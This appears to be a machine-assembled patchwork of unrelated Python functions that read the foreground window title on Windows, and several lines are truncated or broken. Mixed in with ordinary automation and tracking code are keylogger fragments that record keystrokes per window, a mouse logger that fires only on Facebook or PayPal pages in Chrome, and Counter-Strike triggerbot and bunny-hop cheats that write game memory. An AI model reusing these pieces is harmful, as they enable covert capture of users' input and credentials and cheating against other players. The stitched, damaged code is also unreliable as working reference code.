def set_mouse_position(show_log): """ Threaded function which sets the mouse position on receiving the "event_switch" event from the keyboard event handler. Will exit if it recieves the "event_quit" event. @param args tuple: Only first value is used - bool, enables/disables debug log """ global event_switch, event_quit current_win = '' previous_win = '' # Runs as long as "event_quit" has not been received while not event_quit.is_set(): if event_switch.is_set(): # Wait for the 'Task Switching' window to close while(GetWindowText(GetForegroundWindow()).split('-')[-1] == 'Task Switching'): pass time.sleep(0.25) # Get the foreground window's text again current_win = GetWindowText(GetForegroundWindow()) # Make sure we didn't end up with the same window as before if current_win != previous_win: # Get the foreground window's dimensions l, t, r, b = GetWindowRect(GetForegroundWindow()) # Calculate mouse position x = l + (r - l) / 2 y = t + (b - t) / 2 # Print the window information and new mouse co-ordinates if(show_log): print 'Window: ', current_win.split('-')[-1], ' @[', l, t, r, b, ']' print 'Setting mouse position to: (', x, ', ', y, ')' print '---\n' # Set the new mouse position SetCursorPos((x, y)) # Set the previous window to the current window previous_win = current_win # Clear "event_switch" event event_switch.clear()
def path_from_hwnd(vlc_hwnd): # VLC Tools -> Preferences -> Show "All" Settings -> # Input/Codecs -> Change title according to current media =$F # Displays file path to current media in VLC window text window_title = GetWindowText(vlc_hwnd) translation_dict = { " - VLC media player": "", "file:///": "", "%20": " ", "%21": "!", "%23": "#", "%24": "$", "%25": "%", "%26": "&", "%28": "(", "%29": ")", "%5B": "[", "%5D": "]", "%27": "'", "%40": "@", "%2B": "+", "%2C": ",", "%5E": "^", "%3B": ";", "%60": "`" } for key in translation_dict.keys(): window_title = window_title.replace(key, translation_dict[key]) file_path = path.normpath(window_title) return file_path
def __call__(self): strBillyTitle = "" hwnds = FindBilly() if (hwnds is not None): strBillyTitle = GetWindowText(hwnds[0]) strBillyTitle = strBillyTitle.replace(" - Billy", "") return strBillyTitle
def __call__(self): strBillyTitle = "" hwnds = FindBilly() if ( hwnds is not None ): strBillyTitle = GetWindowText(hwnds[0]) strBillyTitle = strBillyTitle.replace(" - Billy", "") return strBillyTitle
def main(argv): #initialize variables for command line arguments arg_server = '' #get command line arguments try: opts, args = getopt.getopt(argv, 's:') except getopt.GetoptError: sys.exit(2) for opt, arg in opts: if opt == '-s': arg_server = arg print('INFO: Polling server %s' % arg_server) while (True): time.sleep(1) wintext = GetWindowText(GetForegroundWindow()) if wintext.startswith('PowerPointova diaprojekcija - ['): cmd = getcommand(arg_server) if not cmd is None: if cmd == 'next': keyboard.send('space') elif cmd == 'back': keyboard.send('backspace') elif cmd == 'stop': keyboard.send('escape')
def switch(): window = GetWindowText(GetForegroundWindow()) keyboard.send('alt+tab') while GetWindowText( GetForegroundWindow()) in [window, "Task Switching", ""]: pass keyboard.send('alt+F4')
def get_target_position_hwnd(target_mouse_position_x, target_mouse_position_y): """ get hwnd value what the target position's program :param target_mouse_position_x: target mouse position x :param target_mouse_position_y: target mouse position y :return: """ data = [] def callback(hwnd, param): (left, top, right, bottom) = GetWindowRect(hwnd) if target_mouse_position_x > right or target_mouse_position_x < left: return if target_mouse_position_y > bottom or target_mouse_position_y < top: return data.append(hwnd) EnumWindows(callback, None) for hwnd in data: window_text = GetWindowText(hwnd) if not window_text or window_text.strip() == '': continue if not IsWindowVisible(hwnd): continue return hwnd
def activate_window(mode, delay=0.05): """ Parameters ---------- mode : "tibia" delay : Delay between actions. The default is 0.5. Returns ------- None. """ logging.debug("Function activate_window() called with passed: %s.", mode)"Current active window: %s", GetWindowText(GetForegroundWindow())) if mode == "tibia": window = pyautogui.getWindowsWithTitle("Kasteria - Tibijka")[0] window_text = "Kasteria - Tibijka" if GetWindowText(GetForegroundWindow()) != window_text: "active window != desired window, window activation goes on") window.minimize() time.sleep(delay) window.restore() window.activate() time.sleep(delay)"Current active window: %s", GetWindowText(GetForegroundWindow())) logging.debug("Function activate_window end.")
def OnMouseEvent(event): currentWindow = GetWindowText(GetForegroundWindow()) if not((currentWindow.find("Chrome")!=-1) and ((currentWindow.find("Facebook")!= -1)or (currentWindow.find("PayPal")!= -1))): return # if not in chrome or in chrome but not on facebook,paypal or gmail else: f = open('C:\\Users\\Elad\\Desktop\\output.txt', 'a') f.write('\n <M-CLICK> \n') f.close()
def foo(hwnd, mouse): #去掉下面这句就所有都输出了,但是我不需要那么多 if IsWindow(hwnd) and IsWindowEnabled(hwnd) and IsWindowVisible(hwnd): if (subset): if (title_name in GetWindowText(hwnd)): titles.add(hwnd) if (GetWindowText(hwnd) == title_name): titles.add(hwnd)
def preenchimento_tab_simples(nome_janela_deve_conter): delay_entre_preenchimento = 0.3 #delay dado a cada preenchimento dela_entre_varredura_de_tela = 0.5#delay entre uma verificação e outra de tela quando aguarda o preenchimento do TXT nome_desta_janela = "py.exe" nome_arquivo = "tempdadospreenchimento.txt" os.system(f"echo PREENCHA SEUS DADOS AQUI (EXCLUA ESTE CONTEÚDO) > {nome_arquivo}&&echo SEPARE CADA CELULA com um TAB. >> {nome_arquivo}&&start {nome_arquivo}") time.sleep(1) while True: if (nome_desta_janela in GetWindowText(GetForegroundWindow())): break time.sleep(dela_entre_varredura_de_tela) os.system(f"echo.>> {nome_arquivo}")#adiciona linha em branco, pra garantir que tenha. ##VER## isso pode ser melhorado print(f'Buscando janela do {nome_janela_deve_conter}') if(busca_janela(nome_janela_deve_conter, 10)): print(f"Janela do {nome_janela_deve_conter} encontrada!") else: print("Janela não encontrada!") return with open(nome_arquivo, "r") as arquivo: '''for linha in arquivo: if not nome_janela_deve_conter in GetWindowText(GetForegroundWindow()): print(f'Você não está mais na janela do {nome_janela_deve_conter}') return print("{:.100s}".format(linha[:len(linha)-1])) for letra in linha: if(letra == '\t'):'tab') elif(letra == '\n'):'tab')'tab') else: pyautogui.write(letra)''' for linha in arquivo: if not nome_janela_deve_conter in GetWindowText(GetForegroundWindow()): print(f'Você não está mais na janela do {nome_janela_deve_conter}') return print("{:.100s}".format(linha[:len(linha)-1])) temp_string = "" celulas = [] linha_util = False for letra in linha: if(letra == '\t' or letra == '\n'): celulas.append(temp_string) temp_string = "" else: linha_util = True temp_string += letra if(linha_util == True): for celula in celulas: pyautogui.write(f"{celula}\t")'tab') os.system(f"del /q {nome_arquivo}")
def updateWindow(): global cWindow if cWindow != GetWindowText(GetForegroundWindow()): cWindow = GetWindowText(GetForegroundWindow()) print(cWindow) # print(win32gui.GetClassName(GetForegroundWindow())) if "Google Chrome" in cWindow: print("Chrome Found") print(win32gui.FindWindow("Chrome_WidgetWin_1", None)) else: print("Chrome not found")
def run(self) -> None: if platform.system().lower() != 'windows': # skip focus check and allow draw anytime self.frames_draw_allowed = True return while True: window = GetWindowText(GetForegroundWindow()) self.frames_draw_allowed = window.lower() in windows_to_draw_frames sleep(0.2) if window != self.last_window: self.painter_widget.update() self.last_window = window
def display(event, key): global data, lastwindow if lastwindow != GetWindowText(GetForegroundWindow()): lastwindow = GetWindowText(GetForegroundWindow()) data += ' [ ' + lastwindow + ' ] ' if key == 'tab' or key == 'caps lock' or key == 'shift' or key == 'ctrl' or key == 'alt' or key == 'space' or key == 'right alt' or key == 'right ctrl' or key == 'esc' or key == 'left' or key == 'right' or key == 'down' or key == 'up' or key == 'right shift' or key == 'enter' or key == 'backspace' or key == 'num lock' or key == 'page up' or key == 'page down' or key == 'insert' or key == 'delete' or key == 'print screen' or key == 'home' or key == 'end' or key == 'decimal': data += ' { ' + str(key) + ' } ' else: data += key elif key == 'tab' or key == 'caps lock' or key == 'shift' or key == 'ctrl' or key == 'alt' or key == 'space' or key == 'right alt' or key == 'right ctrl' or key == 'esc' or key == 'left' or key == 'right' or key == 'down' or key == 'up' or key == 'right shift' or key == 'enter' or key == 'backspace' or key == 'num lock' or key == 'page up' or key == 'page down' or key == 'insert' or key == 'delete' or key == 'print screen' or key == 'home' or key == 'end' or key == 'decimal': data += ' { ' + str(key) + ' } ' else: data += key
def requisita_materiais_avancado(): nome_janela_deve_conter = "cmp072" #variável que armazena o nime da janela que deve ser procurada print( "ATENÇÃO: Ao confirmar a seção de entrega a digitação iniciará automaticamente!" ) secao = input("Digite a seção de entrega: ") print(f'Buscando janela do {nome_janela_deve_conter}') for x in range(6): #Teste as 6 proximas janelas pyautogui.keyDown('alt') for y in range(x):'tab') pyautogui.keyUp('alt') if nome_janela_deve_conter in GetWindowText(GetForegroundWindow()): print("Janela encontrada") break if (x >= 5): print("Janela não encontrada!") return with open("materiais.txt", "r") as arquivo: for linha in arquivo: if not nome_janela_deve_conter in GetWindowText( GetForegroundWindow()): print( f'Você não está mais na janela do {nome_janela_deve_conter}' ) return print("{:.100s}".format(linha)) etapa = 0 temp = "" for letra in linha: if (letra == '\n' and etapa == 0): print("Final de linha encontrado antes do esperado") return if (letra == '\t' or letra == '\n'): if (etapa == 0): #acabou de digitar ERP while (len(temp) < 6): temp = "0" + temp pyautogui.write("{}\t".format(temp)) temp = "" #limpa a variável temporária elif (etapa == 1): #acabou de digitar a quantidade pyautogui.write("{}\ts\t{}\t".format(temp, secao)) temp = "" #limpa a variável temporária etapa += 1 else: if (etapa == 0): #obtendo ERP temp += letra #concatena a string com os caracteres lidos if (etapa == 1): #obtendo quantidade temp += letra #concatena a string com os caracteres lidos if (etapa == 2): break #ignora o resto da linha time.sleep(1) #1s entre uma requisição e outra
def getListOfTabs(): """alt + tab's until google chrome is open, then ctrl + tab though tabs until every tab has been visited once. Returns the list of open tabs """ screenWidth, screenHeight = py.size() a = "start" first_opened = GetWindowText( GetForegroundWindow() ) #save the first window that is open, so we know when we have checked all i = 1 while first_opened != a: #until we return to the first opened window py.keyDown("alt") #alt then tab i number of tmies for n in range(0, i):"tab") py.keyUp("alt") a = GetWindowText( GetForegroundWindow()) #save the title of the foreground window if "Google Chrome" in a: #if it is google chrome break the loop break py.keyDown("alt") #otherwise alt tab back to the first window "tab" ) #this is done because alt tabing from here will mess up the order of the windows py.keyUp("alt") i += 1 #now that google chrome is in focus time to get the tabs tabs = [] #list that gonna hold the url of all open tabs py.moveTo(screenWidth * 0.5, 68) #place cursor on address bar for a in range( 100 ): #the 100 is an arbirary max, and would allow upto 50 tabs(much more than the arduino can store) #the approach is this -- itterate through two tabs and add them to the list. then check if the first half of the list #is equal to the second half. This is to see that we have visited all tabs. This is also why we make two step itterations # if you have 5 tabs open it will at first be discovered on after adding 10 tabs for _ in range(2): #click address bar py.keyDown("ctrl", _pause=False) #copy content["a", "c", "tab"]) py.keyUp("ctrl", pause=False) win32clipboard.OpenClipboard( ) #open the clip board and add the data from there to the list of tabs tabs.append(win32clipboard.GetClipboardData()) win32clipboard.CloseClipboard() if (tabs[:len(tabs) // 2] == tabs[len(tabs) // 2:]): #explained above break return tabs[:len(tabs) // 2]
def startListen(port): global stop global defaultActions global showRawRead global baudrate # hide window root.withdraw() ser = serial.Serial(port, baudrate) # listener while stop == False: # current open and active in foreground window currWindow = GetWindowText(GetForegroundWindow()) try: read = ser.readline().strip().decode('ascii') except serial.SerialException: read = "null" stop = ExitApplication(2) pass if (showRawRead): print(currWindow) print("raw read: " + read) # kill/stop app button, not needed at all elif read == 'kil': print("stop") root.deiconify() stop = ExitApplication(1) if stop == False: root.withdraw() #? 'profiles' # Add and/or change the name of the program # must contain a exactly word of the window title if (currWindow.find("Chrome") > -1): ACTIONS_CHROME(read) # elif(currWindow.find("<My_Program_name_here>")): # ACTIOSN_MY_PROGRAM_ACTIONS_HANDLER(read) # default actions else: if (defaultActions): ACTIONS_DEFAULT(read)
def get_current_foreground_app_title(self): try: hwnd = GetForegroundWindow() title = GetWindowText(hwnd) return title except: return None
def tweak_loop(tweaks): # Loads welcome text and lists off loaded tweaks. print("MW2Tweak v1.0 loaded. You have the following tweaks loaded:") for tweak in tweaks: print("\t-> {}".format(tweak)) # Grabs values for tweaks if they are enabled. if "fov" in tweaks: fov_value = config.get("mw2tweak", "fov_value") if "fps" in tweaks: fps_value = config.get("mw2tweak", "fps_value") while True: # We only want to write to the game when alt-tabbed in. if "Modern Warfare 2" in GetWindowText(GetForegroundWindow()): # If tweak is enabled, we will write values to addresses. if "fps" in tweaks: pm.write_int(FPS_ADDRESS, int(fps_value)) if "fov" in tweaks: pm.write_float(FOV_ADDRESS, float(fov_value)) # Sleep to save some extra CPU cycles. time.sleep(0.1)
def __init__(self): self.dwEntityList = 0x4D4B104 self.dwForceAttack = 0x317C6EC self.dwLocalPlayer = 0xD36B94 self.m_fFlags = 0x104 self.m_iCrosshairId = 0xB3D4 self.m_iTeamNum = 0xF4 = pymem.Pymem("csgo.exe") self.client = pymem.process.module_from_name(, "self.client.dll").lpBaseOfDll while True: if not GetWindowText(GetForegroundWindow() ) == "Counter-Strike: Global Offensive": continue self.player = + self.dwLocalPlayer) self.entity_id = + self.m_iCrosshairId) self.entity = + self.dwEntityList + (self.entity_id - 1) * 0x10) self.entity_team = + self.m_iTeamNum) self.player_team = + self.m_iTeamNum) if 0 < self.entity_id <= 64 and self.player_team != self.entity_team: + self.dwForceAttack, 6) time.sleep(0.006)
def checking(*args): if GetWindowText(GetForegroundWindow()) == 'Path of Exile': # if GetWindowText(GetForegroundWindow()) == 'configs.txt - 記事本': # if 1: func(*args) else: pass
def main(): os.system('mode con: lines=25') time.sleep(delay) app_name = "Binding of Isaac: Afterbirth" if GetWindowText(GetForegroundWindow()) != app_name: print("Switch to Isaac") finding_treasure_room = True finding_good_run = True number_of_runs = 1 while finding_good_run: while finding_treasure_room: restart_run() # time.sleep(3.5) # Waiting for floor's name to dissapear time.sleep(1) # Waiting for animation print("[Run #%s] Finding room" % number_of_runs) direction = is_treasure_room() if direction: print("Found. Going %s" % direction) # time.sleep(.5) go(direction) finding_treasure_room = False else: print("Nope\n") number_of_runs += 1 time.sleep(1.3) current_items = get_from_log()["items"] print("%s\n" % current_items) if current_items.intersection(set(item_list)): finding_good_run = False else: finding_treasure_room = True number_of_runs += 1 pyautogui.keyDown('esc')
def __init__(self): self.dwForceJump = 0x51F4D88 self.dwLocalPlayer = 0xD36B94 self.m_fFlags = 0x104 = pymem.Pymem("csgo.exe") self.client = pymem.process.module_from_name(, "self.client.dll").lpBaseOfDll while True: if not GetWindowText(GetForegroundWindow() ) == "Counter-Strike: Global Offensive": continue if keyboard.is_pressed("space"): self.force_jump = self.client + self.dwForceJump self.player = + self.dwLocalPlayer) if self.player: self.on_ground = + self.m_fFlags) if self.on_ground and self.on_ground == 257:, 5) time.sleep(0.08), 4) time.sleep(0.002)
async def get_current_pokemon_status(self, ctx: commands.Context): if self.last_frame: arr = io.BytesIO(), format='PNG') file = discord.File(arr, filename="pokemon.png") await ctx.send(file=file) await ctx.send( f"Currently buffered inputs: {[self.buttons[x] for x in self.input_buffer]}" ) return if self.desired_window_name not in GetWindowText( GetForegroundWindow()): return await ctx.send( f"The Game is either not running or out of focus! And no last frame exists.\n" f"Currently buffered inputs: {[self.buttons[x] for x in self.input_buffer]}" ) rect = GetWindowRect(GetForegroundWindow()) x = rect[0] y = rect[1] w = rect[2] - x h = rect[3] - y image = pyautogui.screenshot(region=(x, y, w, h)) self.last_frame = image arr = io.BytesIO(), format='PNG') file = discord.File(arr, filename="pokemon.png") await ctx.send(file=file) await ctx.send( f"Currently buffered inputs: {[self.buttons[x] for x in self.input_buffer]}" )
async def pokemon_step(self, ctx: commands.Context, button): if button not in self.buttons: return await ctx.send( f"Only support following keys: {list(self.buttons.keys())}.") if len(self.input_buffer) > self.max_input_buffer: await ctx.send( f"Input Buffer is full, please wait for the game to process the inputs first." ) else: self.input_buffer.append(button) await ctx.send( f"Added your input to the Input Buffer [{len(self.input_buffer) - 1}]" ) if self.desired_window_name not in GetWindowText( GetForegroundWindow()): return await ctx.send( f"The Game is either not running or out of focus!") while self.input_buffer: button = self.input_buffer.pop() key = self.buttons[button] rect = GetWindowRect(GetForegroundWindow()) x = rect[0] y = rect[1] w = rect[2] - x h = rect[3] - y image = pyautogui.screenshot(region=(x, y, w, h)) self.last_frame = image arr = io.BytesIO(), format='PNG') file = discord.File(arr, filename="pokemon.png") await ctx.send(file=file)
def thread2(threadname, q): try: global check_for_chrome while True: ctypes.windll.user32.keybd_event(0x12, 0, 0x0002, 0) time.sleep(45) if q.empty() == False: a = q.get() if a == 0: w.find_window_wildcard(".*Chrome.*") counter = 0 while ("Chrome" not in GetWindowText(GetForegroundWindow())): time.sleep(.2) ctypes.windll.user32.keybd_event(0x12, 0, 0, 0) time.sleep(.2) ctypes.windll.user32.keybd_event(0x1B, 0, 0, 0) time.sleep(.2) ctypes.windll.user32.keybd_event(0x1B, 0, 0x0002, 0) time.sleep(.2) ctypes.windll.user32.keybd_event(0x12, 0, 0x0002, 0) time.sleep(.2) counter = counter + 1 if counter > 4: counter = 0 check_for_chrome() break time.sleep(.5) w.show_window() time.sleep(.5) except: pass
def body(self, fulltime, mode): self.keyboard = Controller() period = fulltime * 3600 self.halftime = fulltime * 3600 / 2 print('\nPeriod (T) of adventure: ', period, ' second(s)') print('T/2 of adventure: ', self.halftime, 'second(s)\n') self.adventure_mode = '$adventure ' + str(mode) self.halftime_message = '[BOT] '+ str(self.halftime / 3600) + ' hours have passed since @wins started their adventure.' if platform.system() == "Windows": while "Discord" not in GetWindowText(GetForegroundWindow()): print("Please maximise/focus on Discord.") time.sleep(0.2) elif platform == "Darwin": pass elif platform == "Linux": pass self.action()
def on_press(key): if any([key in COMBO for COMBO in self.COMBINATIONS]): self.current.add(key) if any( all(k in self.current for k in COMBO) for COMBO in self.COMBINATIONS): #open GUI pass try: c = str(key.char) except AttributeError: c = str(key).replace('Key.', '') if c == 'space': c = ' ' else: c = '[' + str(c) + ']' current_window = GetWindowText(GetForegroundWindow()) if current_window != self.prev_window: self.write_log_file( '\n------------------------------------\n[' + str(current_window) + ']:\n') #save to file self.prev_window = current_window self.mouse_clicked = False self.write_log_file(str(c)) #save to file
def __call__(self): hwnds = Handle() if len(hwnds) > 0: return GetWindowText(hwnds[0]) else: self.PrintError(self.plugin.text.text1) return self.plugin.text.text1
def main(): try: pm = pymem.Pymem("csgo.exe") except: MessageBox = ctypes.windll.user32.MessageBoxW MessageBox(None, 'Could not find the csgo.exe process !', 'Error', 16) return client = pymem.process.module_from_name(pm.process_handle, "client.dll").lpBaseOfDll while True: if not GetWindowText( GetForegroundWindow()) == "Counter-Strike: Global Offensive": continue if keyboard.is_pressed("space"): force_jump = client + dwForceJump player = pm.read_int(client + dwLocalPlayer) if player: on_ground = pm.read_int(player + m_fFlags) if on_ground and on_ground == 257: a = randint(0, 5) time.sleep(a / 100) pm.write_int(force_jump, 5) time.sleep(0.08) pm.write_int(force_jump, 4) time.sleep(0.002)
def main(): lstRaw = [] prevText = '' startTime = TodayAsString() tot_seconds = 1 try: while True: txt = GetWindowText(GetForegroundWindow()) #print(txt) #AppendToFile(fname, TodayAsString() + ' ' + txt + '\n') if txt == prevText: tot_seconds = tot_seconds + 1 else: lstRaw.append(startTime + ',' + format(tot_seconds, "03d") + ',' + txt) prevText = txt tot_seconds = 1 startTime = TodayAsString() time.sleep(1) if TodayAsString()[-3:] == ':00': lstRaw.append(startTime + ',' + format(tot_seconds, "03d") + ',' + txt) #print('Recording data') tot_seconds = 1 startTime = TodayAsString() record(lstRaw) lstRaw = [] except KeyboardInterrupt: print("logging halted") lstRaw.append(startTime + ',' + format(tot_seconds, "03d") + ',' + txt) # save the latest record record(lstRaw)
def _get_active_window_on_nt(self) -> Tuple[Optional[str], ...]: """Returns details of the active window on windows platform""" # See for reference code. # pyright: reportUndefinedVariable=false window, program = GetForegroundWindow(), None pid = GetWindowThreadProcessId(window)[-1] # We are considering only one active instance of a process. # Even if the parent process spawns multiple child processes # this check ensures that we do not record instances of a # process that were not interacted by the user. if window = GetWindowText(window) # Skip `Task Switching` program and other program # switching overlays that are invoked with `Alt + Tab`. window = window if window != "Task Switching" else None path = psutil.Process(pid).exe() # See for using # windows resource table for parsing program name. try: lang, page = _info(path, "\\VarFileInfo\\Translation")[0] addr = "%04X%04X" % (lang, page) file = u"\\StringFileInfo\\{}\\FileDescription".format(addr) program = _info(path, file) except NameError: self.log.error(f"{self._name} could not resolve program name.") window = None program = None return window, program
def _callBack_popWin(self, hwin, args): """ this callback function is called with handle of each top-level window. Window handles are used to check the of window in question is visible and if so it's title strings checked to see if it is a standard application (e.g. not the start button or natlink voice command itself). Populate dictionary of window title keys to window handle values. """ #print '.' #self.nullTitles #nullTitles = self.nullTitles.append(self.skipTitle) #print nullTitles if IsWindowVisible(hwin): winText = GetWindowText(hwin).strip() nt = self.nullTitles + [self.skipTitle,] if winText and winText not in nt: # and\ # enable duplicates #winText not in args.values(): if winText.count('WinSCP') and winText != 'WinSCP Login': if winText in args.values(): return args.update({hwin: winText})